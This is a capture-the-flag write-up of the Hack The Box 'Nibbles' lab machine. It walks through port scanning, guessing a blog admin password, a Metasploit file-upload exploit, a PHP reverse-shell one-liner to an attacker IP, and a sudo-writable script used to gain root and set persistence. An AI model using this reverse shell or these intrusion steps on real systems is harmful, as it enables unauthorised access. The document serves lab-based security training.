Hack The Box: Nibbles machine write-up
This writeup will be shorter than usual given that the machine was fairly easy to root. The ip is 10.10.10.75.
As always, first of all I enumerate open ports to discover the services running in the machine. I ran the following:
1 nmap -sC -sV -oA first 10.10.10.64
And the result was:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 # Nmap 7.01 scan initiated Tue Jun 26 12:27:14 2018 as: nmap -sV -sC -oA nmap/initial 10.10.10.75 Nmap scan report for 10.10.10.75 Host is up (0.047s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) |_ 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn\'t have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jun 26 12:27:38 2018 -- 1 IP address (1 host up) scanned in 25.00 seconds
Not many things in here, so I decide to check the webserver on port 80. Initially I don’t find anything interesting, just a ‘hello world’ message, but then I inspect the server’s response and find out about a directory called ‘nibbleblog’.
Blog on /nibbleblog directory
That’s when I fire up DirBuster and get down to business. I set the initial directory to be nibbleblog and let it run. It enumerated over 400 directories/files, but only one was of interest:
As I hadn’t found any credentials anywhere, it looked like we had to guess the password. Trying with the following credentials resulted in success:
- Username: admin
- Password: nibbles
Once in, we had to find some vulnerability which would allow us to get RCE. After googling for a while, I came across one in metasploit. It was
multi/http/nibbleblog_file_upload. We couldn’t have used it earlier, as it required the username and password to log in to the control system.
It basically takes advantage of an image vulnerability which lets you upload php code instead. So, after setting the parameters, we get a meterpreter session
However, this is not a real shell, so there are many limitations (we can execute limited commands like
ls, but not
whoami, for instance). That said, we could read the user flag.
To get around this issue, I used a php one-liner reverse shell and listened on another terminal window with netcat. Besides, I changed the metasploit payload to
php/reverse_php so that I could execute the one-liner.
php -r '$sock=fsockopen("10.10.14.47",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
nc -lnvp 1234
New payload with fully upgraded reverse php shell
After reading user flag we initially discover a zip file called
personal.zip. I unzipped it and going down two directories to
personal/stuff I come across a file called
The first thing I usually do is run
sudo -l and then
linenum.sh. Well, this time it wasn’t even necessary to do the second one, as
sudo -l revealed that we could edit the file
monitor.sh and run it as sudo. And everyone knows that means we own the box.
sudo -l output
We can just write to the file and then run it:
Getting the root hash
In order to achieve persistency (until the root password is changed), we can set the root password and log in through ssh:
Getting to be root
Diego Bernal Adelantado